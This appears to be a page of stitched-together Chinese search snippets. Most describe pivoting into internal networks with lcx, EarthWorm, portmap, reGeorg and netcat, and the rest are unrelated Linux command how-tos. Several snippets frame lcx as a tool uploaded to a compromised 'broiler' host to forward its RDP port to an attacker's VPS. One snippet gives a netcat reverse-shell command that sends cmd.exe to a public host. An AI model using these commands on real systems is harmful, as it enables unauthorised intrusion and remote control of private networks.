lcx实现端口转发 概念 比较经典的就是lcx。简单说一下概念,首先内网中的主机一般都是使用的私有ip,在网络出口处经过NAT转换为公网ip后,才能访问internet。...所以,有时当我们进入网站后台cmd,或者捕获了一台内网中的肉鸡,是无法主动去链接这台肉鸡的,也不好在别人的网络出口做端口映射,这就体现lcx的作用了。...lcx实现端口转发,将肉鸡A上的某个端口(常用的3389),转发到具有公网地址的主机B上,这样我们只需要连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有ip的限制。...使用 攻击者ip:192.168.1.2 受害者ip:192.168.1.3 将lcx.exe上传到受害者主机上,执行: lcx.exe -slave 192.168.1.2 8080 192.168.1.3...3389 然后攻击者主机上执行: lcx.exe -listen 8080 9999 这样就将受害者主机的3389服务转发到攻击者本地的9999端口上了。
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ....公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 收到会话,随后使用xshell链接 ? ? ?
3:本机执行”lcx -listen 51 10000” 4:用mstsc 连接 “127.0.0.1:10000” 看完这篇文章lcx给我的第一印象就是用来连接内网服务器的3389,不过其实这只是冰山一角...端口转发: Lcx -Listen Lcx -slave <监听端口(对应listen的第一个参数...–tran 30000 2.2.2.2 40000 2、 在172.24.0.2上执行lcx –listen 40050 50000 3、 在10.10.0.2上执行 lcx –slave 3.3.3.3...2、 希望刚入门的朋友可以多参照这篇文章使用lcx来进行内网渗透。...所谓的lcx.exe其实是lcx根据lion的代码所修改编译过的htran,所以这个工具其实不应该叫lcx,不过为了配合大家的习惯这么叫而已,可以看作是简化版本吧。
下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389...用法: 如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。...上传lcx.exe到肉鸡 然后 cx.exe -listen 51 3389 意思是监听51端口并转发到3389端口。...[+] Waiting for Client on port:51 …… 然后在肉鸡上运行 lcx.exe -slave 你的IP 51 222.221.221.22 3389 222.221.221.22...3389连接时格式 127.0.0.1:3333 内网转发姿势 一、lcx 的使用 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave
工具: lcx.exe: 有一个弊端只能windows公网服务器可以使用。...lcx.exe 实例演示: 环境: 目标服务器 Windows Sever2003 内网IP :192.168.181.141 无外网IP ...我们有一个外网IP:10.22.124.132 在目标机器上执行lcx.exe -slave 10.22.124.132 6666 127.0.0.1 3389 意思是把目标机器的 3389
工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,更多平台的支持还在维护中,敬请期待。...该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。 1. 正向 SOCKS v5 服务器 $ ..../ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ ....首先提供两个“二级级联”本地SOCKS测试样例: a) lcx_tran 的用法 $ ./ew -s ssocksd -l 9999 $ ..../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 b) lcx_listen、lcx_slave 的用法 $ .
jpg.tar后,并且将其用compress压缩,生成一个umcompress压缩过的包,命名为jpg.tar.Z rar a jpg.rar *.jpg //rar格式的压缩,需要先下载rar for linux...zip jpg.zip *.jpg //zip格式的压缩,需要先下载zip for linux 解压 tar -xvf file.tar //解压 tar包 tar -xzvf file.tar.gz
有时候我们在编译安装软件的过程中还想执行其他命令做其他事情,一般的做法是再开启1个ssh终端去执行命令,事实上linux已经提供screen多重视窗管理程序模拟多个终端。
---- 最近在写一个监控服务程序,通过交叉监控来监控我们的线上服务。比如我有两台服务器分别为A和B,在A上部署监控程序来监控服务器B,在B上部署监控程序来部署...
Part.0 目录 一、端口转发类 1.Lcx 本地端口转发 正向端口转发 反向端口转发 Linux版lcx 2、Netsh 本地端口转发 正向端口转发 3、SSH 二、SOCKS代理类 1...Linux版lcx Linux版本的lcx叫做portmap 先将对应的c文件上传至linux服务器中: ? 通过gcc进行编译后即可使用: gcc portmap.c -o lcx ?.../lcx -m l -p1 8888 -h2 192.168.3.140 -p2 3389 ? 尝试连接linux的8888端口: ? 成功连接至window的3389端口: ?...reGeorg+proxychains 攻击机如果为linux环境,则使用proxychains进行代理。第一步依然是将webshell上传至目标服务器: ?...//成功~ 类似工具 除了reGeorg之外,还有一些相同用法的工具如下: https://github.com/SECFORCE/Tunna https://github.com/nccgroup/ABPTTS
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。...、lcx_tran) -l 本地要监听的端口 -f 要主动连接的ip -g 要主动连接的端口 -d 要反弹到的ip -e 要反弹到的端口 -s 工作模式 工作模式支持如下: lcx_tran 正向tcp.../ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ ....首先提供两个“二级级联”本地SOCKS测试样例: a) lcx_tran 的用法 $ ./ew -s ssocksd -l 9999 $ ..../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 b) lcx_listen、lcx_slave 的用法 $ .
/agent_linux_x64 -rhost 192.168.0.103 -rport 9999 然后在本地就可以socks代理 本地代理客户段可以使用 冰蝎(测试成功) 通过冰蝎的内网穿透功能可以起...转发工具 windows lcx.exe(没有测试成功) 第一种用法: 1.1.1.1: lcx -listen 1111 2222 2.2.2.2: lcx -slave 1.1.1.1 1111...第二种用法: 1.1.1.1: lcx -tran 2222 2.2.2.2 3389 然后,访问1.1.1.1的2222端口,就相当于访问了2.2.2.2的3389端口。...4444 telnet 1.1.1.1 4444 第二种用法:反向连接 在公网主机(2.2.2.2)上监听端口: 2.2.2.2 nc -lvp 4444 在内网主机(1.1.1.1)上远程回连:...nc -t -e cmd.exe 公网主机ip 4444 linux portmap 先在具有公网ip的主机上执行: .
find 命令在Linux系统中用于在文件系统中搜索符合特定条件的文件和目录。...可以查看相关的Linux文档以获取更详细的信息和示例。
linux 中find 常用示例解析 find [-H] [-L] [-P] [-D debugopts] [-Olevel] [path…] [expression] 其实[-H] [-L] [
没办法关了 firewalld docker就的流量就嘎了,所以重新学习一下 Firewalld. firewalld 是 Linux 中的一个动态防火墙管理工具,它允许配置和管理 iptables 规则...以下是一些常见的 firewalld 命令和用法: 检查 firewalld 状态: sudo systemctl status firewalld 启动 firewalld 服务: sudo systemctl
今天写一下 Linux 常用的命令之 grep 命令,经常用 Linux 的人肯定知道这个命令的强大之处, 俗话说 Grep is your friend grep 的全称是 Global Regular...常用的几个 option 有 -f -n -c -l -i ,更多的可以去看手册,下面我们用几个例子讲解一下 grep 的一些用法 ,假设我们现在有两个文本文件 file1, file2 $ cat
1.expect是linux中一个交互命令,一般在 /usr/bin/expect路径下,如果该路径未加入到环境中需要先添加,其作用场景常用于交互执行输入指令 常用命令: expect
在本文中,我们将介绍 Sed 命令的一些常见用法和示例。 用 Sed 命令打印文件内容 sed -n 'p' filename 上述命令将打印 filename 文件的每一行。
Windows 9x fat32文件系统:vfat Windows NT ntfs文件系统:ntfs Mount Windows文件网络共享:smbfs UNIX(LINUX...更加详细具体的用法,可以参看man mount
sed命令选项 -e script 在处理输入时,将script中指定的命令天到运行的命令中。 -f file 在处理输入时,将file中指定的命令添加到运行的...
领取专属 10元无门槛券
手把手带您无忧上云